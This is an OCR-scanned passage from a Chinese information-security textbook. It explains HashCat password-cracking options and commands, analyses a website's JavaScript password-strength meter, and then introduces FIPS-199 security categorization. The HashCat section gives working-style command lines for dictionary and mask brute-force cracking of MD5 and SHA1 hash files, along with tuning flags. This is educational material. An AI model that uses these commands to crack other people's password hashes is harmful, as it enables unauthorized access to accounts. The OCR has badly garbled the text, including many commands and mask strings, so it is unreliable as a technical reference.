mdScrypt. MDS<CUnix>,. FreeBSD MDS, Cisco-IOS MDS 
MD4 
NTLM 
Domain Cached Credentials. mscash 
SHA256 
sha256 (S$pass .$salt> 


图 7-6 HASH 各 种 类 型 代号 


(3) 指定 破解 模式 

在 HashCat 中 --attack-mode ?参数 可 以 指定 破解 模式 ， 软 件 一 共 支 持 5 种 破解 模式 ， 
分 别 为 : 

0 Straight (字典 破解 ); 

1 Combination (组 合 破解 ); 

3 Brute-force ( 掩 码 暴力 破解 ); 

6 Hybrid dict + mask (混合 字典 + 掩 码 ); 

7 Hybrid mask + dict( 混 合 掩 码 + 字典 )。 

(4) HashCat 中 破解 例子 

以 oclHashCat-plus 为 例 ， 以 下 是 oclHashCat-plus 中 的 参数 介绍 : 

-m 这 个 是 指定 破解 的 hash 的 类 型 ， 具 体 的 类 型 可 以 在 --help 参数 中 看 到 。 默 认 是 0 
也 就 是 MD5。 

-a 指定 破解 的 模式 ， 默 认 是 字典 模式 。 

-0 输出 文件 ， 破 解 成 功 的 密码 存放 的 文件 。 
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--remove 移 除 破 解 成 功 的 hash, = hash 是 从 文本 中 读 取 时 有 用 ， 避 免 自 己 手工 移 
除 已 经 破解 的 hash。 

--usemame 忽略 用 户 名 ， 如 果 你 的 hash 文件 中 是 username: hash 这 种 格式 只 需要 
指定 这 个 参数 ， 就 不 需要 再 手工 编辑 了 。 

了 指定 规则 文件 ， 字 典 根据 规则 文件 做 变形 ， 用 于 破解 相似 密码 。 

@ 字典 破解 

OclHashCat-plus64.exe --hash-type 0 --attack-mode 0 {HASH 文件 } [字典 1] [F 
典 2] [字典 3]... 


这 是 命令 行 中 的 书写 格式 ， 使 用 字典 破解 MD5， 则 其 命令 行 如 下 : 


OclHashCat-plus64.exe --hash-type0--attack-mode 0d: md5.txtd: dictl.txt 
di dict2.txt 


字典 破解 由 于 受到 磁盘 和 内 存 速度 的 影响 ， 速 度 无 法 达到 GPU 的 最 大 运算 速度 ， 
基本 上 一 个 SGB 的 字典 ， 对 于 MDS 破解 来 说 10 分 钟 内 可 以 跑 完 。 
© 暴力 掩 码 破解 
OclHashCat-plus64.exe --hash-type 100 --attack-mode 3 {HASH 文件 } [ 掩 码 ] 
H 
HashCat 中 默认 的 掩 码 一 共有 9 种 ， 如 图 7-7 所 示 。 
* Built-in charsets: 
abcdef ghijklmnopqrstuvwxyz 


ABCDEFGH I JKELMNOPQRS TUUWRYZ 


6123456789 
?1?u?d?s 


VHS 4B! O+, -7:1 5< => 7 BINI* COY 
8 bit characters from @xcO 一 @xff 
8 bit characters from german alphabet 
8 bit characters from french alphabet 
8 bit characters from russian alphabet 


图 7-7 HashCat 掩 码 信息 


?1: a-z; ?u: A-Z; ?d: 0-9; 2a: 键盘 上 所 有 的 特殊 字符 ; ?s: 键盘 上 所 有 的 可 见 
字符 ; Ah: Sbit 0xc0-0x 任 的 十 六 进 制 。 

2D: 8bit 的 德语 字符 ，?F: 8bit aaia IR: 8bit 的 俄语 字符 。 

比如 ?d?d?d?d?d?d?d?d 对 应 8 位 纯 数 字 ?12121?1?d?d?d?d 对 应 前 4 位 小 写字 
母 ， 后 4 位 数字 组 合 。 
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小 写字 母 和 数字 组 合 要 用 掩 码 来 表示 时 ， 就 需要 用 到 自 定义 字符 集 这 个 参数 。 软 件 
支持 用 户 最 多 定义 4 组 字符 集 ， 分 别 为 : 


21 -—-custom-charset1 [chars] 

22 --custom-charset2 [chars] 

23 --custom-charset3 [chars] 

24 -—-custom-charset4 [chars] 

比如 : --custom-charsetl=?1?d， 那 么 ?1 表示 自 定 义 字 符 集 1 为 小 写 + 数 字 ， 那 么 8 
位 随机 的 数字 与 小 写字 母 组 合 ， 掩 码 表示 写成 : ?1?1?1?1?1?1?1?1。 

--custom-charset2 =abcd1234， 那 么 ?22 表示 自 定义 字符 集 2 为 abcd1234， 代 表 字 符 串 
由 abcd1234 组 成 的 所 有 可 能 组 合 ， 掩 码 表 示 为 : ?2?2?2?2?2?2?2?2。 

掩 码 长 度 

对 于 已 知 长 度 的 口令 ， 可 以 使 用 固定 长 度 的 掩 码 进行 破解 。 比 如 需 破 解 10 位 数字 ， 
这 样 就 可 以 写成 是 ?d?d?d?d?d?d?d?d?d?d。 对 于 想 要 破解 一 些 未 知 长 度 的 口令 , 用 户 希 望 


软件 在 一 定 长 度 范围 内 进行 尝试 ， 我 们 可 以 使 用 increment 参数 ， 使 用 --increment-min ? 
定义 最 短 长 度 ， 使 用 一 increment-max ?定义 最 长 长 度 。 比 如 ， 想 要 破解 6-8 位 小 写字 母 ， 
则 可 以 写成 : 


--increment --increment-min 6 --increment-max 8 ?1?1?1?1?1?1?1?1 

破解 8-11 位 数字 + 小 写 ， 可 以 写成 : 

OclHashcat-plus64.exe --hash-type 100 --attack-mode 3 --increment 
--increment-min 8 --increment-max 11 --custom-charsetl ?1?d d: 
shal.txt ?1212121212121212121?1 

参数 优化 


HashCat 本 身 考虑 到 系统 资源 的 分 配 , 默认 参数 下 并 没有 最 大 化 的 来 使 用 硬件 资源 ， 
如 果 想 让 破解 速度 最 大 化 ， 就 需要 对 一 些 参数 进行 配置 。 


Workload tuning 负载 调 优 

该 参数 支持 的 值 有 1, 8, 40, 80, 160. --gpu-accel 160 可 以 让 GPU 发 挥 最 大 性 能 。 
GPU loops 负载 微调 

该 参数 支持 的 值 的 范围 是 8-1024。--gpu-loops 1024 可 以 让 GPU 发 挥 最 大 性 能 。 
Segment size 字典 缓存 大 小 


该 参数 是 设置 内 存 缓存 的 大 小 ， 作 用 是 将 字典 放 入 内 存 缓存 以 加 快 字典 破解 速度 ， 
默认 为 32MB， 可 以 根据 自身 内 存 情况 进行 设置 。--segment-size 512 可 以 提高 大 字典 破 
解 速度 。 
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7.1.2.2 ”常用 网 站 口令 强度 分 析 

1. 概述 

近 几 年 来 ， 相 对 于 口令 破解 技术 的 快速 发 展 ， 为 了 提高 口令 抗 破解 攻击 的 能 力 ， 口 
令 强 度 度量 的 研究 一 直 是 口令 安全 领域 的 重要 研究 方向 。 

目前 口令 强度 度量 领域 的 主要 研究 方向 是 对 口令 强度 进行 定量 计算 。 口 令 强 度 度 量 
算法 使 用 一 个 口令 字符 串 作 为 输入 ， 其 计算 结果 通常 反映 了 攻击 者 破解 该 口令 需要 花费 
的 开销 值 。 口 令 强 度 度 量 的 结果 通常 可 以 用 来 指导 用 户 选 择 合 适 的 口令 ， 或 是 在 用 户 创 
建 口 令 时 用 一 些 强 制 策略 来 确保 口令 的 强度 达到 一 定 标准 。 

目前 ， 国 内 外 主流 网 站 使 用 的 口令 强度 度量 机 制 通常 依靠 口令 的 长 度 ， 以 及 口令 中 
使 用 到 的 字符 类 型 数量 (大写 字母、 小 写字 母 、 数 字 、 特 殊 符 号 4 个 字符 集 ， 对 应 ASCII 
码 表 32~126， 共 计 95 个 字符 ) 来 度量 口令 的 强度 ， 并 以 此 作为 限制 条 件 阻止 用 户 创建 
弱 口 令 。 然 而 ， 这 样 的 算法 效果 较 差 ， 往 往 导 致 一 些 弱 口令 被 系统 接受 ， 而 一 些 强 口令 
反而 被 拒绝 。 

用 户 身份 认证 是 信息 系统 的 第 一 道 安全 防线 , 用 户 名 -口令 机 制 则 是 身份 认证 中 最 常 
用 的 方法 。 尽 管 现在 也 出 现 了 一 些 诸如 图 形 认证 、 用 户 生理 特征 认证 和 基于 硬件 等 多 种 
身份 认证 方法 ， 但 是 口令 机 制 具 有 易 懂 、 易 用 和 易于 实现 的 特点 ， 这 使 得 口令 机 制 在 今 
后 一 段 时 间 依 然 是 用 户 身份 认证 的 一 个 重要 方法 。 但 是 基于 用 户 名 和 口令 的 身份 认证 依 
和 赖 于 用 户 所 选 口令 的 安全 级 别 ， 而 用 户 在 选择 口令 的 时 候 很 难 生 成 一 个 自己 容易 记忆 并 
且 强 度 很 高 、 很 难 被 攻击 的 口令 。 因 此 准确 地 理解 和 判断 用 户口 令 的 安全 性 已 经 成 为 了 
一 个 非常 活跃 和 重要 的 研究 领域 。 

口令 强度 研究 ， 主 要 是 研究 如 何 评 测 口令 的 强度 ， 常 用 的 方法 有 基于 信息 烂 的 评测 
和 基于 攻击 效果 的 评测 。 目 前 各 个 主流 网 站 使 用 的 口令 强度 度量 方法 主要 有 两 类 ， 一 类 
是 利用 Ajax 技术 将 口令 加 密 后 传输 到 服务 器 端 , 由 服务 器 解密 后 再 计算 口令 强度 。 然 而 
让 服务 器 获取 口令 明文 是 与 安全 原则 相 违 背 的 。 另 一 类 方法 是 使 用 JavaScript, 完全 在 用 
户 前 端 Web 页 面 实现 口令 强度 度量 。 但 这 类 方法 通常 而 言 度量 算法 比较 简单 ， 不 能 准确 
地 衡量 口令 的 强 弱 ， 使 得 许多 被 接受 的 口令 强度 仍然 较 弱 ， 容 易 被 某 些 口令 猜测 方法 破 
解 。 目 前 国内 的 大 部 分 网 站 都 采用 的 是 JS 这 种 方式 来 衡量 口令 强度 。 

2. 一 些 常用 网 站 口令 强度 分 析 

(1) CSDN 网 站 衡量 图 

CSDN 网 站 注册 时 衡量 口令 强 弱 如 图 7-8。 网 站 会 显示 创建 口令 的 规则 , 比如 CSDN 
网 站 给 的 提示 就 是 : 6~20 个 字符 ; 只 能 包含 大 小 写 、 数 字 以 及 标点 《空格 除外 )。 用 户 
必须 满足 口令 的 创建 规则 才能 正确 的 创建 口令 ， 否 则 会 被 提示 “密码 长 度 过 短 ， 请 重新 
输入 ”。 

当 用 户 第 一 次 输入 登录 口令 时 ， 在 输入 框 的 后 面 ， 会 有 口令 强度 的 显示 一 一 低 、 中 
还 是 高 ， 由 红色 的 横 条 显示 。 创 建 的 口令 是 低 口 令 时 ， 口 令 强 度 显 示 (3 条 横 线 ) 中 只 


Be 


Ka 
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会 显示 出 一 条 红色 的 横 线 ， 如 果 创 建 的 口令 是 中 口令 ， 则 口令 强度 显示 的 3 条 横 线 中 会 
显示 出 2 条 红色 的 横 线 ， 当 创建 的 口令 是 高 口令 ， 则 三 条 红色 的 口令 强度 显示 横 线 都 将 
会 显现 。 


登录 密 sreesns a 
© 6-200 58 ; 只 能 包含 大 小 
写 、 数 字 以 及 标点 ( 空格 除 
再 输入 一 次 外 ) 


图 7-8 网 站 口令 评估 显示 
(2) 口令 度量 标准 


var Length = { 


lowerLen: 6, ten: 10, fifteen: 15, maxLen: 20 }; 


if ( len == 0 ){ 
level = 0; return level; } 
@ 网 站 口令 长 度 规定 。 代 码 中 Length 是 口令 长 度 的 指 代 ，Length 的 长 度 范围 是 
loweLen: 6-maxLen: 20。 登 录 口令 不 接受 长 度 为 0 的 口令 。 


if ( len >= Length.lowerLen && len < Length.ten ) { 
// 纯 字 母 ， 纯 字符 大 于 等 于 6 位 且 小 于 10 位 为 低级 
if ( checked == 'number' || checked == 'letter' || checked == 
"symbol' ) { 
level = 1; } } 


© 低 口 令 判断 。 判 断 是 否 是 低 口 令 时 ， 首 先 对 口令 长 度 进 行 了 判断 ， 长 度 在 
Length.lowerLen (6) 和 length.ten (10) 之 间 。 口 令 中 只 有 ‘number’, ‘letter’ #il ‘symbol’ 
即 是 纯 数 字 、 纯 字母 或 者 纯 字 符 的 口令 ， 返 回 的 level 值 为 1。Level=1 是 低 口 令 。 


if ( len >= Length.lowerLen && len < Length.ten ) { 
// 混 排 长 度 大 于 等 于 6 位 且 小 于 10 位 为 中 级 
if ( checked == 'mix' ) { 
level = 2; } } 
if ( len >= Length.ten && len <= Length.maxLen ) { 


// 纯 数 字 大 于 等 于 10 位 ， 小 于 等 于 20 位 为 中 级 


if ( checked == 'number' ) { 
level = 2; } 
// 纯 字母 ， 纯 字符 ， 大 于 等 于 10 位 且 小 于 15 位 为 中 级 
if ( len >= Length.ten && len < Length.fifteen ) { 
if ( checked == 'letter' || checked == 'symbol' ) { 
level = 2; } } } 
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@ 中 口令 判断 , 同样 先是 对 口令 长 度 进行 了 判断 。 口令 长 度 在 Length lowerLen (6) 
和 length.ten (10) 之 间 , 口令 中 是 “mix”( 数 字 、 字母 、 字 符 混 排 ) 的 口令 , 返回 的 level 
值 为 2。 口令 长 度 在 Lengthten (10) 和 LengthmaxLen (20) 之 间 , 口令 中 只 有 ‘number’ 
( 纯 数字 ) 的 口令 , 返回 的 level 值 为 2。 口令 长 度 在 Length.ten (10) 和 Length.fifteen (15) 
Zit, ASA ‘letter’, ‘symbol’, MUERTE KAAS AMOS, IBY 
level 值 为 2。Level=2 是 中 口令 。 

// 混 排 大 于 等 于 10 位 且 小 于 20 位 为 高 级 
if ( len >= Length.ten && len <= Length.maxLen ) { 


if ( checked == 'mix' ) { 
level = 3; } } 


// 纯 字 母 ， 纯 字符 大 于 等 于 15 位 且 小 于 20 位 为 高 级 
if ( len >= Length.fifteen && len <= Length.maxLen ) { 
if ( checked == 'letter' || checked == 'symbol' ) { 
level = 3; } } 


© 高 口令 判断 。 当 用 户 输 入 的 口令 长 度 在 Length.ten (10) 和 Length.maxLen (20) 
之 间 时 ,口令 中 是 “mix”( 数 字 、 字 母 、 字 符 混 排 ) 的 口令 ， 返 回 的 level 值 为 3。 当 用 
户 输入 的 口令 长 度 在 Length.fifteen(15) 和 Length.maxLen(20) 之 间 , 口令 中 只 有 ‘letter’ 、 
‘symbol”， 即 是 只 有 纯 字 母 或 是 纯 字 符 的 口令 ,返回 的 level 值 为 3。Level=3 是 高 口令 。 

(3) 现 有 网 站 口令 强度 度量 基本 原则 

分 析 过 CSDN 网 站 口令 强度 衡量 准则 , 可 以 发 现 CSDN 与 国内 其 他 网 站 , 比如 网 易 、 
搜狐 、 新 浪 等 的 口令 强度 衡量 标准 有 一 定 的 相似 性 。 

它们 将 口令 强度 定义 为 低 、 中 和 高 (有 些 网 站 将 口令 强度 定义 为 弱 、 中 和 强 ) 这 三 
个 程度 ， 它 推荐 用 户 在 创建 口令 时 口令 长 度 为 6-20 位 。 分 析 CSDN 口令 衡量 代码 可 知 
口令 的 长 度 关系 着 口令 的 强度 ， 在 一 定 情况 下 ， 长 度 越 长 强度 越 高 。 一 般 来 看 ， 口 令 的 
基本 长 度 为 6 位 ， 最 少 长 度 的 限制 ， 可 以 使 口令 的 强度 有 着 最 低 的 保障 ， 不 至 于 太 过 简 
单 而 被 轻易 破解 。 用 户 创建 口令 时 ,使 用 到 的 字符 类 型 一 一 大 写字 母 、 小 写字 母 、 数 字 、 
特殊 符号 4 个 字符 集 ， 而 在 CSDN 中 不 区 分 字母 的 大 小 写 。 整 体 来 说 ， 字 符 的 种 类 对 于 
口令 的 强度 影响 是 最 大 的 ， 一 般 情况 下 ， 单 一 的 字符 类 型 构成 的 口令 是 低 口 令 ， 两 种 字 
符 类 型 的 口令 就 可 以 是 中 口令 ， 三 种 字符 类 型 同时 使 用 可 使 口令 变 为 高 口令 。 然 而 用 户 
设置 口令 时 ， 一 般 是 选择 字母 和 数字 的 混合 ， 很 少 会 使 用 特殊 字符 ， 这 就 使 得 大 多 数 用 
户 的 口令 强度 比较 低 ， 容 易 被 破解 。 
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7.2.1 信息 系统 安全 需求 分 析 
设计 源 于 需求 ,， 需求 源 于 目标 。 要 和 弄 清 安全 的 需求 , 就 要 首先 明确 安全 的 管理 目标 。 


kd 
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一 般 而 言 ， 针 对 安全 的 管理 目标 包括 政策 需求 和 业务 需求 。 获 取 和 分 析 安 全 需求 通常 是 
从 国家 法 律 、 组 织 政策 、 业 务 策略 和 责任 追究 等 方面 出 发 ， 而 这 些 都 是 系统 管理 层 需要 
考虑 的 内 容 。 安 全 信息 系统 构建 的 最 终 目 标 ， 就 是 要 求 通过 多 层次 手段 最 终 所 实现 的 信 
息 系统 完全 满足 管理 层 的 要 求 。 但 是 ， 由 于 认 知 的 差异 以 及 技术 的 约束 ， 管 理 层 所 期 户 
的 安全 目标 和 安全 信息 系统 的 具体 实现 , 这 二 者 之 间 是 存在 一 定 鸿沟 的 。 对 于 管理 目标 ， 
它 是 由 非 技术 方 的 管理 人 员 所 关注 和 提出 的 ， 而 信息 系统 构建 和 设计 则 主要 由 安全 专家 
和 技术 人 员 进行 的 。 因 此 ， 就 需要 将 安全 需求 从 管理 角度 的 描述 “转化 ”为 可 被 技术 人 
员 理 解 并 实现 的 技术 性 描述 ， 以 便于 安全 专家 和 技术 人 员 进 行 安全 信息 系统 的 具体 设计 
与 实现 。 

当前 ， 不 同 国家 、 不 同行 业 的 组 织 ， 对 于 所 遵循 和 采取 的 标准 和 转化 方法 均 有 所 不 
同 。 在 安全 信息 系统 构建 的 过 程 中 ,国外 有 一 些 可 参考 的 比较 成 熟 的 标准 ， 如 美国 NIST 
所 推行 的 FIPS-199 (Standards for Security Categorization of Federal Information and 
Information Systems-199)， 它 主要 介绍 了 对 美国 联邦 政府 信息 系统 进行 安全 需求 分 类 和 
技术 性 描述 。 本 部 分 将 会 简要 地 介绍 FIPS-199 进行 安全 需求 分 析 的 方法 ， 即 根据 安全 属 
性 和 安全 影响 来 描述 安全 需求 。 通 过 这 一 方法 将 管理 目标 “转化 ”为 可 实际 操作 的 技术 
性 要 求 。 

在 信息 化 发 展 过 程 中 ， 组 织 的 信息 化 发 展 通常 要 考虑 业务 的 需要 来 建设 不 同 的 信息 
系统 。 同 一 个 组 织 内 的 不 同业 务 往往 需要 不 同 的 信息 系统 来 支持 。 因 此 ， 组 织 的 信息 系 
统 都 不 是 独立 存在 的 ， 每 个 信息 系统 都 会 与 组 织 内 其 他 信息 系统 进行 交互 且 存 在 相互 影 
响 。 因 此 ， 在 构建 安全 信息 系统 时 ， 管 理 者 与 设计 者 除了 要 考虑 新 系统 的 安全 问题 ， 也 
应 考虑 该 系统 可 能 会 直接 或 间接 影响 到 其 他 既 有 系统 的 问题 。 整 合 周边 环境 问题 的 方法 
就 是 建立 一 个 组 织 层面 的 安全 架构 。 如 果 不 从 组 织 整体 的 角度 来 考虑 系统 安全 问题 ， 那 
么 即使 新 部 署 的 系统 可 能 是 局 部 安全 最 优 的， 但 也 有 可 能 在 一 定 程度 上 给 组 织 的 整体 环 
境 引进 新 的 安全 弱点 ， 新 部 署 的 系统 就 有 可 能 损害 组 织 内 部 的 其 他 系统 。 由 于 信息 系统 
可 能 与 其 他 的 组 织 内 部 系统 有 人 员 、 业 务 或 资源 的 依赖 关系 ， 从 而 势必 加 剧 了 危害 的 
后 果 。 

此 外 ， 组 织 的 信息 系统 是 为 这 一 组 织 的 具体 业务 服务 的 。 不 同 组 织 往往 有 不 同 的 业 
务 目标 ， 因 此 ， 安 全 管理 需要 从 不 同 角 度 获 取 不 同 的 安全 需求 ， 以 构建 与 安全 需求 相符 
合 的 信息 系统 。 本 部 分 将 主要 从 组 织 层面 考虑 ， 利 用 EA(Enterprise Architecture) 方 法 ， 
从 不 同 视角 〈 业 务 、 信 息 、 解 决 方案 、 技 术 ) 分 析 安 全 信息 系统 构建 的 基础 和 目标 ， 获 
取 组 织 层面 的 和 业务 层面 的 安全 需求 。 在 对 整个 层面 的 安全 需求 获取 方法 有 了 初步 掌握 
后 ， 本 书 将 引入 SDLC 概念 ， 并 将 简要 介绍 安全 信息 系统 的 开发 构建 过 程 。 

7211 信息 系统 安全 需求 

系统 安全 需求 分 析 是 构建 安全 信息 系统 的 基础 。 系 统 安全 需求 分 析 是 指针 对 安全 的 

目标 ， 对 信息 系统 中 可 能 存在 的 风险 及 潜在 威胁 影响 进行 发 现 并 分 析 ， 并 以 此 为 依据 对 


第 7 章 信息 系统 安全 工程 


信息 及 信息 系统 进行 有 依据 的 安全 分 类 ， 从 而 利用 不 同 的 安全 技术 制定 保护 措施 来 应 对 
风险 。 


般 而 言 ， 首 先是 明确 安全 的 目标 。 正 如 之 前 所 讨论 的 ， 安 全 目标 要 因应 组 织 的 情 

况 而 定 ， 首 要 考虑 业务 对 数据 的 依赖 和 相关 法 律 法 规 的 要 求 。 例 如， 在 FIPS-199 安全 需 
求 分 类 方法 中 ， 安 全 目标 的 关键 就 是 实现 安全 的 三 大 要 素 : 

1. 机 密 性 

维护 对 信息 访问 和 公开 经 授权 的 限制 ， 包 括 保护 个 人 隐私 和 私有 的 信息 ， 机 密 性 的 
缺失 是 指 信息 的 非 经 授权 的 公开 。 

2. 完整 性 

防止 信息 不 适当 的 修改 和 毁坏 ， 包 括 保证 信息 的 不 可 抵赖 性 和 真实 性 。 完 整 性 的 缺 
失 是 指 信息 未 经 授权 的 修改 和 毁坏 。 

3. 可 用 性 

保证 信息 及 时 且 可 靠 的 访问 和 使 用 。 可 用 性 的 缺失 是 指 信息 或 信息 系统 的 访问 或 使 
用 被 中 断 。 然 后 ， 基 于 针对 数据 的 安全 目标 ， 分 析 可 能 存在 的 风险 对 于 组 织 和 个 人 的 潜 
在 影响 。 目 前 , 在 国际 上 得 到 广泛 应 用 的 FIPS-199 标准 把 潜在 影响 分 别 定义 为 三 个 级 别 。 
需要 青 次 强调 的 是 ， 这 个 关于 潜在 影响 级 别 的 定义 必须 是 和 每 一 个 给 定 的 组 织 具 体 相 
关 的 。 

针对 每 一 个 安全 属性 ， 作 为 一 个 仅 供 参考 的 指导 原则 ， 潜 在 威胁 影响 可 以 进行 适当 
地 定 级 ， 并 简单 分 为 三 个 级 别 : 

(1) 低 Cow，D) 

预期 的 机 密 性 、 完 整 性 或 可 用 性 可 能 的 缺失 只 能 对 组 织 营运 、 组 织 的 财产 和 个 人 产 
生 有 限 的 负面 影响 。 具 体 来 说 ， 上 述 有 限 的 负面 影响 包括 但 不 限于 以 下 内 容 : 导致 完成 
任务 能 力 的 退化 及 组 织 能 够 履行 其 主要 职能 的 明显 减少 ， 导 致 对 组 织 资产 较 少 的 破坏 ; 
导致 较 少 的 经 济 损失 ， 导 致 对 个 人 较 少 的 伤害 。 

(2) 中 (Moderate,，M) 

预期 的 机 密 性 、 完 整 性 或 可 用 性 可 能 的 缺失 只 能 对 组 织 营运 、 组 织 的 财产 和 个 人 产 
生 严 重 的 负面 影响 。 具 体 来 说 ， 上 述 严重 的 负面 影响 可 以 是 指 : 导致 完成 任务 能 力 的 明 
显 退 化 及 组 织 能 够 履行 其 主要 职能 的 重大 减少 ， 导 致 对 组 织 资产 较 大 的 破坏 ， 导 致 较 大 
的 经 济 损失 ; 导致 对 个 人 较 大 的 伤害 , 但 不 包括 生命 的 丧失 或 者 严重 的 危害 生命 的 伤害 。 

(3) 高 (High, H) 

预期 的 机 密 性 、 完 整 性 或 可 用 性 可 能 的 缺失 造成 对 组 织 营运 、 组 织 的 财产 和 个 人 产 
生 灾 难 性 的 负面 影响 。 有 具体 来 说 ， 上 述 灾 难 性 的 负面 影响 可 以 是 指 : 导致 完成 任务 能 
的 剧烈 退化 及 组 织 无 法 履行 其 一 个 或 多 个 主要 职能 ， 导 致 对 组 织 资产 严重 的 破坏 ; 
严重 的 经 济 损失 :导致 对 个 人 灾难 性 的 伤害 ， 包 括 生 命 的 丧失 或 者 严重 的 危害 生命 
伤害 。 
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最 后 ， 根 据 可 能 存在 的 风险 对 组 织 和 个 人 的 潜在 影响 的 级 别 ， 对 信息 及 信息 系统 的 
安全 进行 分 类 。 一 是 进行 信息 类 型 的 安全 分 类 。 信 息 类 型 的 安全 分 类 可 以 同时 关联 用 户 
信息 和 系统 信息 ， 并 且 包 含 能 够 被 应 用 到 电子 或 非 电子 格式 的 信息 。 二 是 建立 一 个 合适 
的 信息 类 型 安全 分 类 需要 针对 特定 的 安全 类 型 ， 确 定 对 每 一 个 安全 目标 的 潜在 影响 。 

例如 ， 一 般 性 的 信息 类 型 的 安全 分 类 的 表达 如 下 : 

{机 密 性 ， 影 响 等 级 )，( 完 整 性 ， 影 响 等 级 )，( 可 用 性 ， 影 响 等 级 )} 

在 上 述 表 达 式 中 ,“ 影 响 等 级 ”的 值 可 以 取 为 低 、 中 、 高 三 级 ， 以 及 不 适用 Mot 
Applicable，NA )。 在 常见 的 应 用 系统 里 ， 通 常 “ 不 适用 ”只 针对 机 密 性 。 

Bl 7-1 一 个 普通 人 在 它 的 个 人 Web 服务 器 上 管理 其 公开 信息 。 那 么 ， 对 于 这 个 公开 
信息 类 型 ， 首 先 ， 机 密 性 的 缺失 并 没有 什么 潜在 的 影响 ， 因 为 公开 的 信息 没有 保密 的 需 
求 ， 机 密 性 在 公开 信息 类 型 中 并 不 适用 ; 其 次 ， 对 于 完整 性 的 缺失 是 一 个 Moderate 的 影 
响 ; 再次， 对 可 用 性 的 缺失 也 是 一 个 Moderate 的 影响 。 这 种 类 型 的 公开 信息 的 安全 分 类 
表述 如 下 ; 

{机 密 性 ，NA), (完整 性 ，M), (可 用 性 ，M) } 

例 7-2 上 面 这 个 例子 的 分 类 只 适用 于 特定 实例 ， 这 是 因为 安全 分 类 跟 信息 所 涉及 的 
业务 有 关 。 例 如 ， 如 果 公 开 的 信息 是 网 上 证 券 交 易 系 统 实时 提供 的 最 新 股票 报价 的 话 ， 
那么 其 完整 性 和 可 用 性 便 非常 重要 ,这 两 个 属性 对 它们 的 组 织 与 业务 的 影响 都 非常 的 高 。 
这 种 类 型 的 公开 信息 的 安全 分 类 表述 如 下 : 

C OEE NA), GEE, H), THE, H) } 

以 上 介绍 了 信息 类 型 的 安全 分 类 ， 在 此 基础 上 ， 也 可 以 用 同样 的 概念 与 原则 对 信息 
系统 的 安全 进行 分 类 。 一 般 来 说 ， 确 定 信息 系统 的 安全 分 类 需要 更 多 的 分 析 ， 必 须 考虑 
信息 系统 中 所 处 理 的 所 有 信息 类 型 的 安全 分 类 。 

对 于 一 个 信息 系统 ，FIPS-199 的 三 大 安全 目标 同样 适用 。 然 而 ， 它 们 应 该 采用 的 潜 
在 影响 的 赋值 ， 必 须 是 所 有 信息 系统 中 的 信息 类 型 的 安全 分 类 时 确定 的 信息 类 型 潜在 影 
响 的 最 高 值 。 以 下 是 一 般 性 的 信息 系统 的 安全 分 类 的 表述 如 下 : 

{机 密 性 ， 影 响 )，( 完 整 性 ， 影 响 )，( 可 用 性 ， 影 响 〉} 

信息 系统 安全 分 类 的 表达 跟 以 上 介绍 的 信息 类 型 的 安全 分 类 差不多 ， 在 上 述 表 达 式 
中 “影响 ”的 值 可 以 取 : 

。 低 (Low, L); 

e (Moderate, L); 

。 高 High，H)。 

这 里 值得 注意 的 是 ， 跟 信息 类 型 的 分 类 不 一 样 ， 在 进行 信息 系统 安全 分 类 时 ,“ 不 
适用 ”不 能 再 赋值 于 任何 信息 系统 的 安全 目标 。 因 为 对 整体 的 信息 系统 保护 而 言 ， 对 于 
机 密 性 、 完 整 行 、 可 用 性 的 威胁 都 有 最 低 的 潜在 影响 ， 其 目的 就 是 出 于 保护 对 系统 级 别 
的 处 理 功能 和 影响 信息 系统 操作 的 信息 的 基本 要 求 。 一 个 简单 的 解释 是 : 可 以 考虑 系统 
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内 管理 员 的 系统 登录 口令 。 无 论 如 何 这 个 口令 的 保护 都 是 必需 的 ， 因 此 ， 这 信息 的 机 密 
性 就 不 可 能 是 “不 适用 ” 所 以 存储 这 个 口令 的 系统 也 就 不 可 能 有 “不 适用 ”的 机 密 性 赋 
值 了 。 

此 外 , 在 目前 互联 网 系统 中 ， 当 信息 涉及 公众 个 人 利益 时 候 , 还 存在 隐私 性 的 概念 ， 
这 一 概念 是 FIPS-199 所 没有 定义 的 , 这 一 点 也 需要 设计 者 在 特定 的 应 用 场景 与 业务 背景 
下 了 予以 考虑 与 探讨 其 相应 的 分 类 。 

7212 ”安全 信息 系统 的 构建 过 程 

1. 安全 信息 系统 构建 基础 与 目标 

目前 ， 各 种 组 织 对 于 信息 安全 都 越 来 越 重视 ， 基 于 网 络 的 新 一 代 大 型 信息 系统 也 得 
到 越 来 越 广泛 的 应 用 ， 但 与 此 同时 ， 这 些 信息 系统 也 面临 着 越 来 越 严 峻 的 安全 态势 和 威 
胁 。 一 般 而 言 ， 大 型 网 络 信息 系统 面临 着 两 方面 的 安全 挑战 。 

(1) 组 织 内 的 信息 技术 环境 威胁 

由 于 组 织 的 信息 系统 都 会 在 一 个 给 定 的 信息 技术 环境 中 运作 ， 信 息 系 统 的 安全 设计 
一 般 都 会 对 它 置身 其 中 的 环境 做 出 某 些 物理 、 控 制 、 威 胁 等 方面 的 假设 ， 因 此 ， 组 织 
的 信息 技术 环境 与 信息 系统 假设 的 环境 是 否 匹 配 往 往 是 很 多 安全 漏洞 的 来 源 。 例 如 ， 组 
织 一 般 会 希望 能 够 规划 设计 一 个 与 周边 信息 技术 环境 整合 的 信息 系统 。 一 般 来 说 ， 整 个 
信息 系统 的 建设 都 是 由 业务 驱动 的 ， 但 这 一 规划 设计 过 程 经 常会 因为 技术 人 员 和 业务 人 
员 之 间 沟 通 不 畅 而 失败 。 由 于 这 个 沟通 上 的 问题 ， 如 果 信 息 系统 的 设计 是 由 业务 管理 人 
员 主导 的 ， 那 么 信息 系统 跟 周边 的 信息 技术 环境 的 整合 就 很 容易 出 现 问题 。 但 由 此 所 面 
临 的 安全 问题 ， 就 是 信息 系统 不 能 被 确定 其 信息 技术 环境 是 否 完全 彻底 地 满足 它 的 运作 
要 求 。 此 外 ， 由 于 信息 系统 的 庞大 性 ， 不 可 避免 地 会 出 现 多 种 系统 环境 融合 的 不 一 致 问 
题 ， 这 也 使 得 整个 信息 系统 的 技术 环境 无 法 获得 确定 的 保障 。 

(2) 信息 系统 的 系统 安全 管理 问题 

随 着 一 个 组 织 的 业务 不 断 扩 大 和 处 理 数据 的 增多 ， 组 织 的 信息 系统 变 得 越 来 越 庞 大 
而 日 趋 难以 管理 ， 这 就 需要 由 具有 专业 技能 的 管理 人 员 来 实现 安全 管理 。 对 组 织 而 言 ， 
信息 系统 是 受 业 务 驱 动 并 为 业务 提供 服务 的 。 因 为 业务 运作 对 信息 系统 的 依赖 性 ， 组 织 
